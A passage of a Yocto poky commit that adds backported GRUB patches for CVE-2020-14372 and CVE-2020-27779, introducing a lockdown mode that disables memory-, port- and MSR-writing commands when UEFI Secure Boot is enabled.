a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def +index 474a63e..cff02f2 100644 +--- a/grub-core/Makefile.core.def ++++ b/grub-core/Makefile.core.def +@@ -140,6 +140,7 @@ kernel = { + common = kern/rescue_parser.c; + common = kern/rescue_reader.c; + common = kern/term.c; ++ common = kern/verifiers.c; + + noemu = kern/compiler-rt.c; + noemu = kern/mm.c; +@@ -942,11 +943,6 @@ module = { + cppflags = '-I$(srcdir)/lib/posix_wrap'; + }; + +-module = { +- name = verifiers; +- common = commands/verifiers.c; +-}; +- + module = { + name = shim_lock; + common = commands/efi/shim_lock.c; +diff --git a/grub-core/kern/main.c b/grub-core/kern/main.c +index 9cad0c4..73967e2 100644 +--- a/grub-core/kern/main.c ++++ b/grub-core/kern/main.c +@@ -29,6 +29,7 @@ + #include + #include + #include ++#include + + #ifdef GRUB_MACHINE_PCBIOS + #include +@@ -274,6 +275,9 @@ grub_main (void) + grub_printf ("Welcome to GRUB!\n\n"); + grub_setcolorstate (GRUB_TERM_COLOR_STANDARD); + ++ /* Init verifiers API. */ ++ grub_verifiers_init (); ++ + grub_load_config (); + + grub_boot_time ("Before loading embedded modules."); +diff --git a/grub-core/commands/verifiers.c b/grub-core/kern/verifiers.c +similarity index 97% +rename from grub-core/commands/verifiers.c +rename to grub-core/kern/verifiers.c +index 0dde481..aa3dc7c 100644 +--- a/grub-core/commands/verifiers.c ++++ b/grub-core/kern/verifiers.c +@@ -217,12 +217,8 @@ grub_verify_string (char *str, enum grub_verify_string_type type) + return GRUB_ERR_NONE; + } + +-GRUB_MOD_INIT(verifiers) ++void ++grub_verifiers_init (void) + { + grub_file_filter_register (GRUB_FILE_FILTER_VERIFY, grub_verifiers_open); + } +- +-GRUB_MOD_FINI(verifiers) +-{ +- grub_file_filter_unregister (GRUB_FILE_FILTER_VERIFY); +-} +diff --git a/include/grub/verify.h b/include/grub/verify.h +index ea04914..cd129c3 100644 +--- a/include/grub/verify.h ++++ b/include/grub/verify.h +@@ -64,7 +64,10 @@ struct grub_file_verifier + grub_err_t (*verify_string) (char *str, enum grub_verify_string_type type); + }; + +-extern struct grub_file_verifier *grub_file_verifiers; ++extern struct grub_file_verifier *EXPORT_VAR (grub_file_verifiers); ++ ++extern void ++grub_verifiers_init (void); + + static inline void + grub_verifier_register (struct grub_file_verifier *ver) +@@ -78,7 +81,7 @@ grub_verifier_unregister (struct grub_file_verifier *ver) + grub_list_remove (GRUB_AS_LIST (ver)); + } + +-grub_err_t +-grub_verify_string (char *str, enum grub_verify_string_type type); ++extern grub_err_t ++EXPORT_FUNC (grub_verify_string) (char *str, enum grub_verify_string_type type); + + #endif /* ! GRUB_VERIFY_HEADER */ diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch new file mode 100644 index 0000000000..a98b5d0455 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_2.patch @@ -0,0 +1,431 @@ +From d8aac4517fef0f0188a60a2a8ff9cafdd9c7ca42 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Mon, 28 Sep 2020 20:08:02 +0200 +Subject: [PATCH] kern: Add lockdown support + +When the GRUB starts on a secure boot platform, some commands can be +used to subvert the protections provided by the verification mechanism and +could lead to booting untrusted system. + +To prevent that situation, allow GRUB to be locked down. That way the code +may check if GRUB has been locked down and further restrict the commands +that are registered or what subset of their functionality could be used. + +The lockdown support adds the following components: + +* The grub_lockdown() function which can be used to lockdown GRUB if, + e.g., UEFI Secure Boot is enabled. + +* The grub_is_lockdown() function which can be used to check if the GRUB + was locked down. + +* A verifier that flags OS kernels, the GRUB modules, Device Trees and ACPI + tables as GRUB_VERIFY_FLAGS_DEFER_AUTH to defer verification to other + verifiers. These files are only successfully verified if another registered + verifier returns success. Otherwise, the whole verification process fails. + + For example, PE/COFF binaries verification can be done by the shim_lock + verifier which validates the signatures using the shim_lock protocol. + However, the verification is not deferred directly to the shim_lock verifier. + The shim_lock verifier is hooked into the verification process instead. + +* A set of grub_{command,extcmd}_lockdown functions that can be used by + code registering command handlers, to only register unsafe commands if + the GRUB has not been locked down. + +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=578c95298bcc46e0296f4c786db64c2ff26ce2cc] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska +--- + conf/Makefile.common | 2 + + docs/grub-dev.texi | 27 +++++++++++++ + docs/grub.texi | 8 ++++ + grub-core/Makefile.am | 5 ++- + grub-core/Makefile.core.def | 1 + + grub-core/commands/extcmd.c | 23 +++++++++++ + grub-core/kern/command.c | 24 +++++++++++ + grub-core/kern/lockdown.c | 80 +++++++++++++++++++++++++++++++++++++ + include/grub/command.h | 5 +++ + include/grub/extcmd.h | 7 ++++ + include/grub/lockdown.h | 44 ++++++++++++++++++++ + 11 files changed, 225 insertions(+), 1 deletion(-) + create mode 100644 grub-core/kern/lockdown.c + create mode 100644 include/grub/lockdown.h + +diff --git a/conf/Makefile.common b/conf/Makefile.common +index 6cd71cb..2a1a886 100644 +--- a/conf/Makefile.common ++++ b/conf/Makefile.common +@@ -84,7 +84,9 @@ CPPFLAGS_PARTTOOL_LIST = -Dgrub_parttool_register=PARTTOOL_LIST_MARKER + CPPFLAGS_TERMINAL_LIST = '-Dgrub_term_register_input(...)=INPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_TERMINAL_LIST += '-Dgrub_term_register_output(...)=OUTPUT_TERMINAL_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_COMMAND_LIST = '-Dgrub_register_command(...)=COMMAND_LIST_MARKER(__VA_ARGS__)' ++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_lockdown(...)=COMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd(...)=EXTCOMMAND_LIST_MARKER(__VA_ARGS__)' ++CPPFLAGS_COMMAND_LIST += '-Dgrub_register_extcmd_lockdown(...)=EXTCOMMAND_LOCKDOWN_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_COMMAND_LIST += '-Dgrub_register_command_p1(...)=P1COMMAND_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_FDT_LIST := '-Dgrub_fdtbus_register(...)=FDT_DRIVER_LIST_MARKER(__VA_ARGS__)' + CPPFLAGS_MARKER = $(CPPFLAGS_FS_LIST) $(CPPFLAGS_VIDEO_LIST) \ +diff --git a/docs/grub-dev.texi b/docs/grub-dev.texi +index ee389fd..635ec72 100644 +--- a/docs/grub-dev.texi ++++ b/docs/grub-dev.texi +@@ -86,6 +86,7 @@ This edition documents version @value{VERSION}. + * PFF2 Font File Format:: + * Graphical Menu Software Design:: + * Verifiers framework:: ++* Lockdown framework:: + * Copying This Manual:: Copying This Manual + * Index:: + @end menu +@@ -2086,6 +2087,32 @@ Optionally at the end of the file @samp{fini}, if it exists, is called with just + the context. If you return no error during any of @samp{init}, @samp{write} and + @samp{fini} then the file is considered as having succeded verification. + ++@node Lockdown framework ++@chapter Lockdown framework ++ ++The GRUB can be locked down, which is a restricted mode where some operations ++are not allowed. For instance, some commands cannot be used when the GRUB is ++locked down. ++ ++The function ++@code{grub_lockdown()} is used to lockdown GRUB and the function ++@code{grub_is_lockdown()} function can be used to check whether lockdown is ++enabled or not. When enabled, the function returns @samp{GRUB_LOCKDOWN_ENABLED} ++and @samp{GRUB_LOCKDOWN_DISABLED} when is not enabled. ++ ++The following functions can be used to register the commands that can only be ++used when lockdown is disabled: ++ ++@itemize ++ ++@item @code{grub_cmd_lockdown()} registers command which should not run when the ++GRUB is in lockdown mode. ++ ++@item @code{grub_cmd_lockdown()} registers extended command which should not run ++when the GRUB is in lockdown mode. ++ ++@end itemize ++ + @node Copying This Manual + @appendix Copying This Manual + +diff --git a/docs/grub.texi b/docs/grub.texi +index 8779507..d778bfb 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -5581,6 +5581,7 @@ environment variables and commands are listed in the same order. + * Using digital signatures:: Booting digitally signed code + * UEFI secure boot and shim:: Booting digitally signed PE files + * Measured Boot:: Measuring boot components ++* Lockdown:: Lockdown when booting on a secure setup + @end menu + + @node Authentication and authorisation +@@ -5794,6 +5795,13 @@ into @file{core.img} in order to avoid a potential gap in measurement between + + Measured boot is currently only supported on EFI platforms. + ++@node Lockdown ++@section Lockdown when booting on a secure setup ++ ++The GRUB can be locked down when booted on a secure boot environment, for example ++if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will ++be restricted and some operations/commands cannot be executed. ++ + @node Platform limitations + @chapter Platform limitations + +diff --git a/grub-core/Makefile.am b/grub-core/Makefile.am +index 375c30d..3096241 100644 +--- a/grub-core/Makefile.am ++++ b/grub-core/Makefile.am +@@ -79,6 +79,7 @@ KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/fs.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/i18n.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/kernel.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/list.h ++KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/lockdown.h + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/misc.h + if COND_emu + KERNEL_HEADER_FILES += $(top_srcdir)/include/grub/compiler-rt-emu.h +@@ -376,8 +377,10 @@ command.lst: $(MARKER_FILES) + b=`basename $$pp .marker`; \ + sed -n \ + -e "/EXTCOMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \ ++ -e "/EXTCOMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \ + -e "/P1COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/*\1: $$b/;p;}" \ +- -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \ ++ -e "/COMMAND_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" \ ++ -e "/COMMAND_LOCKDOWN_LIST_MARKER *( *\"/{s/.*( *\"\([^\"]*\)\".*/\1: $$b/;p;}" $$pp; \ + done) | sort -u > $@ + platform_DATA += command.lst + CLEANFILES += command.lst +diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def +index cff02f2..651ea2a 100644 +--- a/grub-core/Makefile.core.def ++++ b/grub-core/Makefile.core.def +@@ -204,6 +204,7 @@ kernel = { + efi = term/efi/console.c; + efi = kern/acpi.c; + efi = kern/efi/acpi.c; ++ efi = kern/lockdown.c; + i386_coreboot = kern/i386/pc/acpi.c; + i386_multiboot = kern/i386/pc/acpi.c; + i386_coreboot = kern/acpi.c; +diff --git a/grub-core/commands/extcmd.c b/grub-core/commands/extcmd.c +index 69574e2..90a5ca2 100644 +--- a/grub-core/commands/extcmd.c ++++ b/grub-core/commands/extcmd.c +@@ -19,6 +19,7 @@ + + #include + #include ++#include + #include + #include + #include +@@ -110,6 +111,28 @@ grub_register_extcmd (const char *name, grub_extcmd_func_t func, + summary, description, parser, 1); + } + ++static grub_err_t ++grub_extcmd_lockdown (grub_extcmd_context_t ctxt __attribute__ ((unused)), ++ int argc __attribute__ ((unused)), ++ char **argv __attribute__ ((unused))) ++{ ++ return grub_error (GRUB_ERR_ACCESS_DENIED, ++ N_("%s: the command is not allowed when lockdown is enforced"), ++ ctxt->extcmd->cmd->name); ++} ++ ++grub_extcmd_t ++grub_register_extcmd_lockdown (const char *name, grub_extcmd_func_t func, ++ grub_command_flags_t flags, const char *summary, ++ const char *description, ++ const struct grub_arg_option *parser) ++{ ++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED) ++ func = grub_extcmd_lockdown; ++ ++ return grub_register_extcmd (name, func, flags, summary, description, parser); ++} ++ + void + grub_unregister_extcmd (grub_extcmd_t ext) + { +diff --git a/grub-core/kern/command.c b/grub-core/kern/command.c +index acd7218..4aabcd4 100644 +--- a/grub-core/kern/command.c ++++ b/grub-core/kern/command.c +@@ -17,6 +17,7 @@ + * along with GRUB. If not, see . + */ + ++#include + #include + #include + +@@ -77,6 +78,29 @@ grub_register_command_prio (const char *name, + return cmd; + } + ++static grub_err_t ++grub_cmd_lockdown (grub_command_t cmd __attribute__ ((unused)), ++ int argc __attribute__ ((unused)), ++ char **argv __attribute__ ((unused))) ++ ++{ ++ return grub_error (GRUB_ERR_ACCESS_DENIED, ++ N_("%s: the command is not allowed when lockdown is enforced"), ++ cmd->name); ++} ++ ++grub_command_t ++grub_register_command_lockdown (const char *name, ++ grub_command_func_t func, ++ const char *summary, ++ const char *description) ++{ ++ if (grub_is_lockdown () == GRUB_LOCKDOWN_ENABLED) ++ func = grub_cmd_lockdown; ++ ++ return grub_register_command_prio (name, func, summary, description, 0); ++} ++ + void + grub_unregister_command (grub_command_t cmd) + { +diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c +new file mode 100644 +index 0000000..1e56c0b +--- /dev/null ++++ b/grub-core/kern/lockdown.c +@@ -0,0 +1,80 @@ ++/* ++ * GRUB -- GRand Unified Bootloader ++ * Copyright (C) 2020 Free Software Foundation, Inc. ++ * ++ * GRUB is free software: you can redistribute it and/or modify ++ * it under the terms of the GNU General Public License as published by ++ * the Free Software Foundation, either version 3 of the License, or ++ * (at your option) any later version. ++ * ++ * GRUB is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. ++ * ++ * You should have received a copy of the GNU General Public License ++ * along with GRUB. If not, see . ++ * ++ */ ++ ++#include ++#include ++#include ++#include ++ ++static int lockdown = GRUB_LOCKDOWN_DISABLED; ++ ++static grub_err_t ++lockdown_verifier_init (grub_file_t io __attribute__ ((unused)), ++ enum grub_file_type type, ++ void **context __attribute__ ((unused)), ++ enum grub_verify_flags *flags) ++{ ++ *flags = GRUB_VERIFY_FLAGS_SKIP_VERIFICATION; ++ ++ switch (type & GRUB_FILE_TYPE_MASK) ++ { ++ case GRUB_FILE_TYPE_GRUB_MODULE: ++ case GRUB_FILE_TYPE_LINUX_KERNEL: ++ case GRUB_FILE_TYPE_MULTIBOOT_KERNEL: ++ case GRUB_FILE_TYPE_XEN_HYPERVISOR: ++ case GRUB_FILE_TYPE_BSD_KERNEL: ++ case GRUB_FILE_TYPE_XNU_KERNEL: ++ case GRUB_FILE_TYPE_PLAN9_KERNEL: ++ case GRUB_FILE_TYPE_NTLDR: ++ case GRUB_FILE_TYPE_TRUECRYPT: ++ case GRUB_FILE_TYPE_FREEDOS: ++ case GRUB_FILE_TYPE_PXECHAINLOADER: ++ case GRUB_FILE_TYPE_PCCHAINLOADER: ++ case GRUB_FILE_TYPE_COREBOOT_CHAINLOADER: ++ case GRUB_FILE_TYPE_EFI_CHAINLOADED_IMAGE: ++ case GRUB_FILE_TYPE_ACPI_TABLE: ++ case GRUB_FILE_TYPE_DEVICE_TREE_IMAGE: ++ *flags = GRUB_VERIFY_FLAGS_DEFER_AUTH; ++ ++ /* Fall through. */ ++ ++ default: ++ return GRUB_ERR_NONE; ++ } ++} ++ ++struct grub_file_verifier lockdown_verifier = ++ { ++ .name = "lockdown_verifier", ++ .init = lockdown_verifier_init, ++ }; ++ ++void ++grub_lockdown (void) ++{ ++ lockdown = GRUB_LOCKDOWN_ENABLED; ++ ++ grub_verifier_register (&lockdown_verifier); ++} ++ ++int ++grub_is_lockdown (void) ++{ ++ return lockdown; ++} +diff --git a/include/grub/command.h b/include/grub/command.h +index eee4e84..2a6f7f8 100644 +--- a/include/grub/command.h ++++ b/include/grub/command.h +@@ -86,6 +86,11 @@ EXPORT_FUNC(grub_register_command_prio) (const char *name, + const char *summary, + const char *description, + int prio); ++grub_command_t ++EXPORT_FUNC(grub_register_command_lockdown) (const char *name, ++ grub_command_func_t func, ++ const char *summary, ++ const char *description); + void EXPORT_FUNC(grub_unregister_command) (grub_command_t cmd); + + static inline grub_command_t +diff --git a/include/grub/extcmd.h b/include/grub/extcmd.h +index 19fe592..fe9248b 100644 +--- a/include/grub/extcmd.h ++++ b/include/grub/extcmd.h +@@ -62,6 +62,13 @@ grub_extcmd_t EXPORT_FUNC(grub_register_extcmd) (const char *name, + const char *description, + const struct grub_arg_option *parser); + ++grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_lockdown) (const char *name, ++ grub_extcmd_func_t func, ++ grub_command_flags_t flags, ++ const char *summary, ++ const char *description, ++ const struct grub_arg_option *parser); ++ + grub_extcmd_t EXPORT_FUNC(grub_register_extcmd_prio) (const char *name, + grub_extcmd_func_t func, + grub_command_flags_t flags, +diff --git a/include/grub/lockdown.h b/include/grub/lockdown.h +new file mode 100644 +index 0000000..40531fa +--- /dev/null ++++ b/include/grub/lockdown.h +@@ -0,0 +1,44 @@ ++/* ++ * GRUB -- GRand Unified Bootloader ++ * Copyright (C) 2020 Free Software Foundation, Inc. ++ * ++ * GRUB is free software: you can redistribute it and/or modify ++ * it under the terms of the GNU General Public License as published by ++ * the Free Software Foundation, either version 3 of the License, or ++ * (at your option) any later version. ++ * ++ * GRUB is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. ++ * ++ * You should have received a copy of the GNU General Public License ++ * along with GRUB. If not, see . ++ */ ++ ++#ifndef GRUB_LOCKDOWN_H ++#define GRUB_LOCKDOWN_H 1 ++ ++#include ++ ++#define GRUB_LOCKDOWN_DISABLED 0 ++#define GRUB_LOCKDOWN_ENABLED 1 ++ ++#ifdef GRUB_MACHINE_EFI ++extern void ++EXPORT_FUNC (grub_lockdown) (void); ++extern int ++EXPORT_FUNC (grub_is_lockdown) (void); ++#else ++static inline void ++grub_lockdown (void) ++{ ++} ++ ++static inline int ++grub_is_lockdown (void) ++{ ++ return GRUB_LOCKDOWN_DISABLED; ++} ++#endif ++#endif /* ! GRUB_LOCKDOWN_H */ diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch new file mode 100644 index 0000000000..93fdd2cb1a --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_3.patch @@ -0,0 +1,57 @@ +From bfb9c44298aa202c176fef8dc5ea48f9b0e76e5e Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Tue, 2 Feb 2021 19:59:48 +0100 +Subject: [PATCH] kern/lockdown: Set a variable if the GRUB is locked down + +It may be useful for scripts to determine whether the GRUB is locked +down or not. Add the lockdown variable which is set to "y" when the GRUB +is locked down. + +Suggested-by: Dimitri John Ledkov +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d90367471779c240e002e62edfb6b31fc85b4908] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska +--- + docs/grub.texi | 3 +++ + grub-core/kern/lockdown.c | 4 ++++ + 2 files changed, 7 insertions(+) + +diff --git a/docs/grub.texi b/docs/grub.texi +index d778bfb..5e6cace 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -5802,6 +5802,9 @@ The GRUB can be locked down when booted on a secure boot environment, for exampl + if the UEFI secure boot is enabled. On a locked down configuration, the GRUB will + be restricted and some operations/commands cannot be executed. + ++The @samp{lockdown} variable is set to @samp{y} when the GRUB is locked down. ++Otherwise it does not exit. ++ + @node Platform limitations + @chapter Platform limitations + +diff --git a/grub-core/kern/lockdown.c b/grub-core/kern/lockdown.c +index 1e56c0b..0bc70fd 100644 +--- a/grub-core/kern/lockdown.c ++++ b/grub-core/kern/lockdown.c +@@ -18,6 +18,7 @@ + */ + + #include ++#include + #include + #include + #include +@@ -71,6 +72,9 @@ grub_lockdown (void) + lockdown = GRUB_LOCKDOWN_ENABLED; + + grub_verifier_register (&lockdown_verifier); ++ ++ grub_env_set ("lockdown", "y"); ++ grub_env_export ("lockdown"); + } + + int diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch new file mode 100644 index 0000000000..ac509b63c7 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_4.patch @@ -0,0 +1,52 @@ +From 0d809c0979ced9db4d0e500b3e812bba95e52972 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Mon, 28 Sep 2020 20:08:29 +0200 +Subject: [PATCH] efi: Lockdown the GRUB when the UEFI Secure Boot is enabled + +If the UEFI Secure Boot is enabled then the GRUB must be locked down +to prevent executing code that can potentially be used to subvert its +verification mechanisms. + +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=98b00a403cbf2ba6833d1ac0499871b27a08eb77] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska +--- + grub-core/kern/efi/init.c | 15 +++++++++++++++ + 1 file changed, 15 insertions(+) + +diff --git a/grub-core/kern/efi/init.c b/grub-core/kern/efi/init.c +index 3dfdf2d..db84d82 100644 +--- a/grub-core/kern/efi/init.c ++++ b/grub-core/kern/efi/init.c +@@ -20,6 +20,7 @@ + #include + #include + #include ++#include + #include + #include + #include +@@ -39,6 +40,20 @@ grub_efi_init (void) + /* Initialize the memory management system. */ + grub_efi_mm_init (); + ++ /* ++ * Lockdown the GRUB and register the shim_lock verifier ++ * if the UEFI Secure Boot is enabled. ++ */ ++ if (grub_efi_secure_boot ()) ++ { ++ grub_lockdown (); ++ /* NOTE: Our version does not have the shim_lock_verifier, ++ * need to update below if added */ ++#if 0 ++ grub_shim_lock_verifier_setup (); ++#endif ++ } ++ + efi_call_4 (grub_efi_system_table->boot_services->set_watchdog_timer, + 0, 0, 0, NULL); + diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch new file mode 100644 index 0000000000..12ec4e1c17 --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-14372_5.patch @@ -0,0 +1,158 @@ +From 1ad728b08ba2a21573e5f81a565114f74ca33988 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Mon, 28 Sep 2020 20:08:33 +0200 +Subject: [PATCH] efi: Use grub_is_lockdown() instead of hardcoding a disabled + modules list + +Now the GRUB can check if it has been locked down and this can be used to +prevent executing commands that can be utilized to circumvent the UEFI +Secure Boot mechanisms. So, instead of hardcoding a list of modules that +have to be disabled, prevent the usage of commands that can be dangerous. + +This not only allows the commands to be disabled on other platforms, but +also properly separate the concerns. Since the shim_lock verifier logic +should be only about preventing to run untrusted binaries and not about +defining these kind of policies. + +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8f73052885892bc0dbc01e297f79d7cf4925e491] +CVE: CVE-2020-14372 +Signed-off-by: Marta Rybczynska +--- + docs/grub.texi | 10 ++++++++++ + grub-core/commands/i386/wrmsr.c | 5 +++-- + grub-core/commands/iorw.c | 19 ++++++++++--------- + grub-core/commands/memrw.c | 19 ++++++++++--------- + 4 files changed, 33 insertions(+), 20 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index 5e6cace..0786427 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -5256,6 +5256,9 @@ only applies to the particular cpu/core/thread that runs the command. + Also, if you specify a reserved or unimplemented MSR address, it will + cause a general protection exception (which is not currently being handled) + and the system will reboot. ++ ++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}). ++ This is done to prevent subverting various security mechanisms. + @end deffn + + @node xen_hypervisor +@@ -5758,6 +5761,13 @@ security reasons. All above mentioned requirements are enforced by the + shim_lock module. And itself it is a persistent module which means that + it cannot be unloaded if it was loaded into the memory. + ++All GRUB modules not stored in the @file{core.img}, OS kernels, ACPI tables, ++Device Trees, etc. have to be signed, e.g, using PGP. Additionally, the commands ++that can be used to subvert the UEFI secure boot mechanism, such as @command{iorw} ++and @command{memrw} will not be available when the UEFI secure boot is enabled. ++This is done for security reasons and are enforced by the GRUB Lockdown mechanism ++(@pxref{Lockdown}). ++ + @node Measured Boot + @section Measuring boot components + +diff --git a/grub-core/commands/i386/wrmsr.c b/grub-core/commands/i386/wrmsr.c +index 9c5e510..56a29c2 100644 +--- a/grub-core/commands/i386/wrmsr.c ++++ b/grub-core/commands/i386/wrmsr.c +@@ -24,6 +24,7 @@ + #include + #include + #include ++#include + #include + #include + #include +@@ -83,8 +84,8 @@ grub_cmd_msr_write (grub_command_t cmd __attribute__ ((unused)), int argc, char + + GRUB_MOD_INIT(wrmsr) + { +- cmd_write = grub_register_command ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"), +- N_("Write a value to a CPU model specific register.")); ++ cmd_write = grub_register_command_lockdown ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"), ++ N_("Write a value to a CPU model specific register.")); + } + + GRUB_MOD_FINI(wrmsr) +diff --git a/grub-core/commands/iorw.c b/grub-core/commands/iorw.c +index a0c164e..584baec 100644 +--- a/grub-core/commands/iorw.c ++++ b/grub-core/commands/iorw.c +@@ -23,6 +23,7 @@ + #include + #include + #include ++#include + + GRUB_MOD_LICENSE ("GPLv3+"); + +@@ -131,17 +132,17 @@ GRUB_MOD_INIT(memrw) + N_("PORT"), N_("Read 32-bit value from PORT."), + options); + cmd_write_byte = +- grub_register_command ("outb", grub_cmd_write, +- N_("PORT VALUE [MASK]"), +- N_("Write 8-bit VALUE to PORT.")); ++ grub_register_command_lockdown ("outb", grub_cmd_write, ++ N_("PORT VALUE [MASK]"), ++ N_("Write 8-bit VALUE to PORT.")); + cmd_write_word = +- grub_register_command ("outw", grub_cmd_write, +- N_("PORT VALUE [MASK]"), +- N_("Write 16-bit VALUE to PORT.")); ++ grub_register_command_lockdown ("outw", grub_cmd_write, ++ N_("PORT VALUE [MASK]"), ++ N_("Write 16-bit VALUE to PORT.")); + cmd_write_dword = +- grub_register_command ("outl", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 32-bit VALUE to PORT.")); ++ grub_register_command_lockdown ("outl", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 32-bit VALUE to PORT.")); + } + + GRUB_MOD_FINI(memrw) +diff --git a/grub-core/commands/memrw.c b/grub-core/commands/memrw.c +index 98769ea..d401a6d 100644 +--- a/grub-core/commands/memrw.c ++++ b/grub-core/commands/memrw.c +@@ -22,6 +22,7 @@ + #include + #include + #include ++#include + + GRUB_MOD_LICENSE ("GPLv3+"); + +@@ -133,17 +134,17 @@ GRUB_MOD_INIT(memrw) + N_("ADDR"), N_("Read 32-bit value from ADDR."), + options); + cmd_write_byte = +- grub_register_command ("write_byte", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 8-bit VALUE to ADDR.")); ++ grub_register_command_lockdown ("write_byte", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 8-bit VALUE to ADDR.")); + cmd_write_word = +- grub_register_command ("write_word", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 16-bit VALUE to ADDR.")); ++ grub_register_command_lockdown ("write_word", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 16-bit VALUE to ADDR.")); + cmd_write_dword = +- grub_register_command ("write_dword", grub_cmd_write, +- N_("ADDR VALUE [MASK]"), +- N_("Write 32-bit VALUE to ADDR.")); ++ grub_register_command_lockdown ("write_dword", grub_cmd_write, ++ N_("ADDR VALUE [MASK]"), ++ N_("Write 32-bit VALUE to ADDR.")); + } + + GRUB_MOD_FINI(memrw) diff --git a/poky/meta/recipes-bsp/grub/files/CVE-2020-27779.patch b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779.patch new file mode 100644 index 0000000000..c82423b8af --- /dev/null +++ b/poky/meta/recipes-bsp/grub/files/CVE-2020-27779.patch @@ -0,0 +1,70 @@ +From 584263eca1546e5cab69ba6fe7b4b07df2630a21 Mon Sep 17 00:00:00 2001 +From: Javier Martinez Canillas +Date: Wed, 14 Oct 2020 16:33:42 +0200 +Subject: [PATCH] mmap: Don't register cutmem and badram commands when lockdown + is enforced + +The cutmem and badram commands can be used to remove EFI memory regions +and potentially disable the UEFI Secure Boot. Prevent the commands to be +registered if the GRUB is locked down. + +Fixes: CVE-2020-27779 + +Reported-by: Teddy Reed +Signed-off-by: Javier Martinez Canillas +Reviewed-by: Daniel Kiper + +Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=d298b41f90cbf1f2e5a10e29daa1fc92ddee52c9] +CVE: CVE-2020-27779 +Signed-off-by: Marta Rybczynska +--- + docs/grub.texi | 4 ++++ + grub-core/mmap/mmap.c | 13 +++++++------ + 2 files changed, 11 insertions(+), 6 deletions(-) + +diff --git a/docs/grub.texi b/docs/grub.texi +index 47ac7ff..a1aaee6 100644 +--- a/docs/grub.texi ++++ b/docs/grub.texi +@@ -4051,6 +4051,10 @@ this page is to be filtered. This syntax makes it easy to represent patterns + that are often result of memory damage, due to physical distribution of memory + cells. + ++Note: The command is not allowed when lockdown is enforced 